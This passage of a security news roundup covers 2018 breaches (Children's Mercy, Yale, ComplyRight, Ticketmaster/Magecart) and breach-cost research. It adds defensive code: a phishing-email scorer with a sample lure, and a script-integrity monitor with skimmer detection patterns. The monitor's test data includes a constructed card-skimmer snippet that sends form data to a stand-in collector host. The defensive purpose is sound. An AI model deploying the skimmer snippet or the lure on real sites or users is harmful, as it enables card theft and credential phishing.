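        hit(1, f"Reply-To domain {reply_to} differs from sender domain")

    # Body: gather text and HTML from the non-attachment parts.
    text, html = "", ""
    for part in msg.walk():
        if part.is_attachment():
            continue
        if part.get_content_type() == "text/plain":
            text += part.get_content()
        elif part.get_content_type() == "text/html":
            html += part.get_content()

    # Links: the URL the reader sees vs the real href, raw IPs, lookalike hosts.
    for href, anchor in HREF_RE.findall(html):
        real = (urlparse(href).hostname or "").lower()
        shown = URL_RE.findall(anchor)
        if shown and (urlparse(shown[0]).hostname or "").lower() != real:
            hit(3, f"link text shows {shown[0]} but points to {href}")
        if IPV4_RE.fullmatch(real):
            hit(2, f"link points at a raw IP address: {real}")
        elif imitated_domain(real):
            hit(2, f"link host {real} imitates {imitated_domain(real)}")

    # Pressure wording in subject and body, capped so it cannot dominate.
    haystack = " ".join([str(msg.get("Subject", "")), text, re.sub(r"<[^>]+>", " ", html)]).lower()
    words = [w for w in URGENCY if w in haystack]
    if words:
        hit(min(len(words), 2), "urgency wording: " + ", ".join(words))

    # Attachments with executable or macro-bearing extensions.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_EXT):
            hit(3, f"risky attachment {name}")

    score = sum(points for points, _ in findings)
    verdict = "quarantine" if score >= 5 else "flag" if score >= 3 else "deliver"
    return {"score": score, "verdict": verdict, "reasons": [why for _, why in findings]}

def build_sample(phish: bool) -> bytes:
    """Constructed messages: a lure (lookalike sender, mismatched link, .exe
    attachment) or a benign internal reminder."""
    m = EmailMessage()
    m["To"] = "nurse@childrens-example.org"
    if not phish:
        m["From"] = "Training Office <training@childrens-example.org>"
        m["Subject"] = "Quarterly training module now available"
        m.set_content("The module is at https://childrens-example.org/training. Due next month.")
        return m.as_bytes()
    m["From"] = "IT Helpdesk <helpdesk@childrens-example-login.net>"
    m["Reply-To"] = "support@mail-verify.example"
    m["Subject"] = "URGENT: your password will expire today"
    m.set_content("Verify your account immediately: http://childrens-example.org/login")
    m.add_alternative('<p>Verify your account immediately: <a href="http://203.0.113.45/owa/login">'
                      'http://childrens-example.org/login</a></p>', subtype="html")
    m.add_attachment(b"MZ\x90\x00", maintype="application", subtype="octet-stream",
                     filename="invoice.exe")
    return m.as_bytes()

if __name__ == "__main__":
    for raw in (build_sample(True), build_sample(False)):
        print(score_message(raw))
```

A production gateway adds what this scorer deliberately leaves out: SPF, DKIM and DMARC results on the sender, URL and attachment reputation, and detonation of attachments in a sandbox. What the block shows is the per-message triage logic and where the tuning lives; the `flag` verdict is the band where a human applies the “read the link” check Ponemon describes, and the mismatch between displayed and real URL is the single strongest signal because a legitimate sender has no reason to produce it.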

Additionally, Ponemon said healthcare organizations often operate a “flat network,” instead of having layers, meaning when something happens in one device, it can spread very quickly to multiple devices, which he described as a “lateral infection.”

“Malware infections on one system can actually touch hundreds or even thousands of systems in the world of IoT; in healthcare everything is about an IoT device,” Ponemon said. “That’s why it’s easy for bad stuff, malware, phishing scams, to spread quickly.”

Jacobson, with Children’s Mercy, said the hospital has taken steps to protect against further incidents, including adding multifactor authentication as a technical control. The hospital has also set up a call center and an informational webpage to answer questions from families who might have been affected and is offering free identity theft protection to those families.

Medical records breaches not new

The lawsuit against Children’s Mercy Hospital was filed by the firm McShane & Brady in July. Attorney Maureen Brady said the firm would like to see medical records breaches stopped.

“It’s very hard because you can’t unring that bell,” Brady said. “Once the information is out, it’s out forever; you can’t get it back … the anxiety and embarrassment and humiliation that goes along with this type of disclosure is astronomical.”

The threat of a medical records breach is not new to the healthcare community. Though 2017 saw fewer massive health data breaches than 2016, 5.6 million Americans were affected by a medical records breach that year, an average of at least one breach per day, according to data released last year by Protenus.

In addition to the newly filed lawsuit, Children’s Mercy Hospital has faced other lawsuits in the past for medical records breaches.

Yale data breach discovered 10 years too late

Yale University discovered it suffered a data breach — 10 years ago.

The Yale data breach occurred at some point between April 2008 and January 2009, but officials are unsure exactly when. The Yale data breach included sensitive data such as names, Social Security numbers and birth dates on an unknown number of people, as well as some email addresses and physical addresses.

Because the Yale data breach happened so long ago, the University claimed it did not have much information on how it occurred. In its announcement of the breach, Yale noted that in 2011, the school’s IT “deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time.”

The Yale data breach was not discovered until June 2018 when the school’s IT was “testing its servers for vulnerabilities and discovered a log that revealed the intrusion.”

Ryan Wilk, vice president at NuData Security, said the data included in the breach was more than enough to put users at risk.

“Although financial information was not exposed, even having your Social Security number, name, address and date of birth stolen can still cause problems,” Wilk wrote via email. “Cybercriminals can use this information to create a complete profile of students. Add a bit of social engineering, and they can start cracking all types of accounts and even open up new accounts in the students’ names.”

The school said it notified those students, alumni, faculty and staff members affected by the breach and has offered identity monitoring services.

Zach Seward, CPO and executive editor at Quartz, was one victim in the Yale data breach, and he relayed his story on Twitter.

Wilk said it might not be Yale’s fault for not discovering the breach sooner.

“Malicious actors are learning not only to access a system but also to do it without leaving a trace. This extreme sophistication results in hard-to-uncover breaches that can take a long time to reveal. We encourage companies and organizations to monitor their security system constantly and to stay alert for any unusual activity,” Wilk wrote. “Even if they’ve checked unusual activity thousands of times and it turned out to be nothing risky, the next time that anomaly may just be your cybercriminal at work.”

Ponemon: Mega breaches, data breach costs on the rise

The Ponemon Institute’s latest study on data breach costs highlights the rise of what it calls “mega breaches,” which are the worst types of security incidents in terms of costs and data exposed.

The “2018 Cost of a Data Breach Study: Global Overview,” which was sponsored by IBM Security, details the cost enterprises incur after falling victim to a data breach and found that the average total cost of a data breach rose from $3.62 million to $3.86 million, a 6.4% increase, with $148 as the average cost per lost or stolen record. This year’s report also features data on the biggest breaches, which Ponemon and IBM have termed “mega breaches.”

“Mega breaches are where there are more than one million records that have been breached,” Limor Kessem, executive security advisor at IBM, told SearchSecurity. “And then we looked at up to 50 million [records exposed], although it could be up to infinity these days. Just last year there were 2.9 billion records exposed, and in 2016 there were over 4 billion records exposed, so a breach can be millions and hundreds of millions as well.”

Given that this is the first year Ponemon has included mega breaches in its annual report and that only 11 mega breaches occurred, there was no data from past years to compare these findings to. However, the report found that a mega breach at the minimum of 1 million records exposed led to an average total cost of $40 million, while a mega breach with 50 million records exposed had an average cost of $350 million.

After collecting data from more than 2,500 separate interviews conducted over a 10-month period with 477 enterprises, the study concluded that mega breaches take an average of 365 days to identify, almost 100 days longer than the 266 days it takes to identify a typical breach.

The Ponemon study also discovered that “data breaches are the most costly in the United States and the Middle East and least costly in Brazil and India,” given that the average total in the United States was $7.91 million. “The U.S. topped the chart at almost twice the international average,” Kessem said. “Of course there are currency differences, but the big thing in the U.S. is loss of business.”

Kessem further noted that when consumers were interviewed, 75% of them said they would not want to do business with a company that they didn’t trust to safeguard their data.

“People in the U.S. are very aware of breaches,” she said. “They topped the charts in awareness of how [data breaches] happen and how many happen and so on. In other words, we know breaches are happening and we wouldn’t like to do business with those who can’t protect our data and I think this was a major cost center for the U.S. in terms of data breaches.”

In addition to the per-record cost, companies also incur direct and indirect costs after a breach. Canada has the highest direct costs, according to the report, while the U.S. has the highest indirect cost at $152 per capita, which includes “employee’s time, effort and other organizational resources spent notifying victims and investigating the incident.” The study also finds that breaches in the healthcare industry are the most expensive and have been consistently so for several years, which Kessem attributes to the amount of personal data healthcare companies hold.

“Typically [healthcare companies] have a lot of personally identifiable information,” she said. “They’re also going to have payment information and contact information — the more information is attached to an identity, the more it is going to cost.”

Post-breach consequences are further addressed in the report, which states, “Organizations that lost less than one percent of their customers due to a data breach resulted in an average total cost of $2.8 million.” However, the Ponemon study also noted that an incident response team has the ability to reduce the cost by as much as $14 per compromised record — a small change that would greatly add up at the end of a breach.

ComplyRight data breach affects 662,000, gets lawsuit

A data breach at ComplyRight, a firm that provides HR and tax services to businesses, may have affected 662,000 people, according to a state agency. It has also prompted a lawsuit, which was filed in federal court by a person who was notified that their personal data was breached. The lawsuit seeks class-action status.

The ComplyRight data breach included names, addresses, phone numbers, email addresses and Social Security numbers, some of which came from tax and W-2 forms.

ComplyRight’s services include a range of HR products, such as recruitment, time and attendance, as well as an online app for storing essential employee data. This particular attack was directed at its tax-form-preparation website. Attackers target customer and employee data: the Identity Theft Resource Center’s 2018 midyear report, which lists every known breach so far this year, described the data compromised in this incident as a shopping list of HR-managed data.

Company: No more than 10% of customers affected

The breach occurred between April 20 and May 22, and the company notified affected parties by mail.

ComplyRight, in a posted statement, said “a portion (less than 10%)” of people who have their tax forms prepared on its web platform were affected by a cyberattack, but it did not say how many customers were affected by its breach. The company knows the data was accessed or viewed, but it was unable to determine if the data was downloaded, according to the firm’s statement.

But the state of Wisconsin, which publishes data breach reports, has shed some light on the scale of the impact. It reported the ComplyRight data breach affected 662,000 people — including 12,155 Wisconsin residents. A spokesman for Wisconsin Department of Agriculture, Trade and Consumer Protection said this figure was provided verbally to the state by an attorney for ComplyRight.

Rick Roddis, president of ComplyRight, based in Pompano Beach, Fla., said in an email that the firm won’t be commenting, for now, beyond what it has posted on the site.

Among the steps ComplyRight said it took was the hiring of a third-party security expert who conducted a forensic investigation. The firm is also offering credit-monitoring services to affected parties.

Security expert Nikolai Vargas, who looked at the firm’s statement, said ComplyRight “is doing the bare minimum in terms of transparency and informing their clients of the details of the security incident.”

“In cases of a data breach, it is important to disclose how long the exposure occurred and the scope of the exposure,” said Vargas, who is CTO of Switchfast, an IT consulting and managed service provider based in Chicago. ComplyRight stating that “less than 10%” of individuals were affected “doesn’t really explain how many people were impacted,” he added.

“Technical details are nice to have, but they’re not always necessary and may need to be withheld until protections are put in place,” Vargas said.

Federal suit alleges poor protection


The ComplyRight data breach was first reported by Krebs on Security, which had heard from customers who had received breach notification letters.

Susan Winstead, an Illinois resident, received the notification from ComplyRight on July 17, outlining what happened. She is the plaintiff in the lawsuit filed July 20 in the U.S. District Court for the Northern District of Illinois.

The lawsuit faults ComplyRight for allegedly not properly protecting its data and not immediately notifying affected individuals, and the suit seeks damages for the improper disclosure of personal information, including the time and effort to remediate the data breach.

Company faced difficult detective work

Another independent expert who looked at ComplyRight’s notice, Avani Desai, said the company “followed best practice for incident response.”

With a cyberattack, one of the most difficult processes initially is identifying that there was an actual attack and the true extent of it, said Desai, president of Schellman & Company, a security and privacy compliance assessor in Tampa, Fla. It’s important to ask the following questions early: Was there sensitive information that was involved? Which systems were exploited? The firm quickly hired a third-party forensic group, she noted.

“ComplyRight locked down the system prior to announcing the breach, which is important, because when organizations announce too quickly, we see copycat attacks hit the already vulnerable situation,” Desai said.

Mike Sanchez, chief information security officer of United Data Technologies, an IT technology and services firm in Doral, Fla., said the things the firm did right are “they disabled the platform and performed a forensic investigation to understand the cause of the breach, as well as the breadth of the malicious actor’s actions.”

But Sanchez said the firm’s statement, which he described as a “very high-level summary,” lacked many specifics, including the exact flaw that was used to gain access to the data.

The Identity Theft Resource Center reported that as of the first six months of this year, there were 668 breaches exposing nearly 22.5 million records.

Ticketmaster breach part of worldwide card-skimming campaign

The attack that caused the Ticketmaster breach of customer information last month was actually part of a widespread campaign that’s affected more than 800 e-commerce sites.

According to researchers at the threat intelligence company RiskIQ Inc., the hacking group known as Magecart has been running a digital credit card-skimming campaign that targets third-party components of e-commerce websites around the world.

At the end of June, ticket sales company Ticketmaster disclosed that it had been compromised and user credit card data had been skimmed. A report by RiskIQ researchers Yonathan Klijnsma and Jordan Herman said the Ticketmaster breach was not an isolated incident, but was instead part of the broader campaign run by the threat group Magecart.

“The target for Magecart actors was the payment information entered into forms on Ticketmaster’s various websites,” Klijnsma and Herman wrote in a blog post. “The method was hacking third-party components shared by many of the most frequented e-commerce sites in the world.”

A digital credit card skimmer, according to RiskIQ, uses scripts injected into websites to steal data entered into forms. Magecart “placed one of these digital skimmers on Ticketmaster websites through the compromise of a third-party functionality supplier known as Inbenta,” the researchers said, noting specifically that Ticketmaster’s network was not directly breached.

RiskIQ has been tracking the activities of Magecart since 2015 and said attacks by the group have been “ramping up in frequency and impact” throughout the past few years, and Ticketmaster and Inbenta are not the only organizations that have been affected by this threat.

According to Klijnsma and Herman, Inbenta’s custom JavaScript code was “wholly replaced” with card skimmers by Magecart.

“In the use of third-party JavaScript libraries, whether a customized module or not, it may be expected that configuration options are available to modify the generated JavaScript. However, the entire replacement of the script in question is generally beyond what one would expect to see,” they wrote.

RiskIQ also noted that the command and control servers to which the skimmed data is sent have been active since 2016, though that doesn’t mean the Ticketmaster websites were affected the entire time.

The Ticketmaster breach is just “the tip of the iceberg” according to Klijnsma and Herman.

“The Ticketmaster incident received quite a lot of publicity and attention, but the Magecart problem extends to e-commerce sites well beyond Ticketmaster, and we believe it’s cause for far greater concern,” they wrote. “We’ve identified over 800 victim websites from Magecart’s main campaigns making it likely bigger than any other credit card breach to date.”
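The control that addresses a wholly replaced third-party script, as an added example that is not RiskIQ’s, Ticketmaster’s or Inbenta’s code: the page pins the approved script’s digest in a Subresource Integrity `integrity` attribute, so the browser refuses to execute any other body, and a scheduled job re-hashes what the supplier is currently serving against the pinned value and, on a mismatch, runs a static triage for skimmer traits (form enumeration, a submit hook, encoding, an outbound call to a host the page never talks to). `ALLOWED_HOSTS`, the trait regexes, the host names and both script bodies are assumptions constructed for the example; the second body is a caricature of a skimmer, not real malware.

```python
"""Pin a third-party script with Subresource Integrity and re-check what the
supplier is serving. Added example, not RiskIQ's, Ticketmaster's or Inbenta's
code; the host names and both script bodies below are constructed."""
import base64
import hashlib
import hmac
import re
from urllib.parse import urlparse

# Assumed: hosts the page legitimately talks to. A served script that
# references anything else is worth a look.
ALLOWED_HOSTS = {"shop.example", "widget-supplier.example"}

# Static traits typical of a form skimmer: enumerate inputs, hook the submit
# or click, encode the result, and push it to a collector.
SKIMMER_TRAITS = {
    "reads form fields": re.compile(r"document\.forms|querySelectorAll\(\s*['\"]input", re.I),
    "hooks submit/click": re.compile(r"addEventListener\(\s*['\"](submit|click)", re.I),
    "encodes payload": re.compile(r"\bbtoa\(|JSON\.stringify\(", re.I),
    "sends data out": re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new Image\(", re.I),
}
URL_RE = re.compile(r"https?://[\w.-]+(?:/[^\s'\"]*)?", re.I)

def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity value in the form browsers expect: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"

def script_tag(src: str, body: bytes) -> str:
    """Pinned <script> tag to emit at build time; the browser rejects any other body."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            'crossorigin="anonymous"></script>')

def integrity_ok(pinned: str, served: bytes) -> bool:
    """True if what the supplier serves now still matches the pinned digest."""
    algo = pinned.split("-", 1)[0]
    return hmac.compare_digest(sri_hash(served, algo), pinned)

def audit_script(served: bytes) -> dict:
    """Static triage of a served script: unknown hosts and skimmer traits."""
    text = served.decode("utf-8", "replace")
    hosts = {(urlparse(u).hostname or "").lower() for u in URL_RE.findall(text)}
    unknown = sorted(h for h in hosts if h and h not in ALLOWED_HOSTS)
    traits = [name for name, rx in SKIMMER_TRAITS.items() if rx.search(text)]
    return {"unknown_hosts": unknown, "traits": traits,
            "suspicious": bool(unknown) and len(traits) >= 3}

def monitor(pinned: str, served: bytes) -> dict:
    """What a scheduled fetch-and-compare job would report for one pinned script."""
    report = {"integrity_ok": integrity_ok(pinned, served)}
    if not report["integrity_ok"]:
        report.update(audit_script(served))
    return report

# Constructed samples: a stand-in for a supplier's help widget, and a
# caricature of a skimmer that replaced it (not real malware).
GOOD_JS = b"""(function(){var w=document.createElement('div');w.id='help-widget';
w.textContent='Need help?';document.body.appendChild(w);
fetch('https://widget-supplier.example/api/config');})();"""
REPLACED_JS = b"""(function(){function grab(){var o={};
document.querySelectorAll('input').forEach(function(i){o[i.name]=i.value;});
return btoa(JSON.stringify(o));}
document.addEventListener('submit',function(){
new Image().src='https://stats-collector.example/i.png?d='+grab();});})();"""
PINNED = sri_hash(GOOD_JS)  # what the build pinned when the widget was approved

if __name__ == "__main__":
    print(script_tag("https://widget-supplier.example/widget.js", GOOD_JS))
    print(monitor(PINNED, GOOD_JS))      # integrity_ok: True
    print(monitor(PINNED, REPLACED_JS))  # integrity_ok: False, suspicious: True
```

Two caveats a practitioner will want. First, the pin only works for scripts you load yourself with a `<script src>` tag; a supplier that ships a legitimate update breaks the page until you review and re-pin, which is the intended property, since an update you did not approve is exactly what happened here. Second, a Content Security Policy whose `connect-src` and `img-src` are limited to the hosts in `ALLOWED_HOSTS` closes the exfiltration path even when a skimmer does manage to run, because the beacon to the collector is refused by the browser.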

In other news:

  • The U.K.’s Information Commissioner’s Office (ICO) is fining Facebook £500,000 — more than $600,000 — for failing to protect its users’ data from misuse by Cambridge Analytica. The ICO is also going to bring criminal charges against the parent company of Cambridge Analytica, which gathered the data of millions of Americans before the 2016 presidential election. The ICO has been investigating data privacy abuses like the one by Cambridge Analytica — which has since gone out of business — and its investigations will continue. The fine brought against Facebook is reportedly the largest ever issued by the ICO and the maximum amount allowed under the U.K.’s Data Protection Act.
  • Apple will roll out USB Restricted Mode as part of the new version of iOS 11.4.1. USB Restricted Mode prevents iOS devices that have been locked for over an hour from connecting with USB devices that plug into the Lightning port. “If you don’t first unlock your password-protected iOS device — or you haven’t unlocked and connected it to a USB accessory within the past hour — your iOS device won’t communicate with the accessory or computer, and, in some cases, it might not charge,” Apple explained. Apple hasn’t provided the reason for this feature, but it will make it more difficult for forensics analysts and law enforcement to access data on locked devices.
  • Security researcher Troy Hunt discovered an online credential stuffing list that contained 111 million compromised records. The records included email addresses and passwords that were stored on a web server in France. The data set Hunt looked at had a folder called “USA” — though it has not been confirmed whether or not all the data came from Americans — and the files had dates starting in early April 2018. “That one file alone had millions of records in it and due to the nature of password reuse, hundreds of thousands of those, at least, will unlock all sorts of other accounts belonging to the email addresses involved,” Hunt said. The site with this information has been taken down, so it’s no longer accessible. Hunt also said there’s no way to know which websites leaked the credentials and suggests users implement password managers and make their passwords stronger and more unique.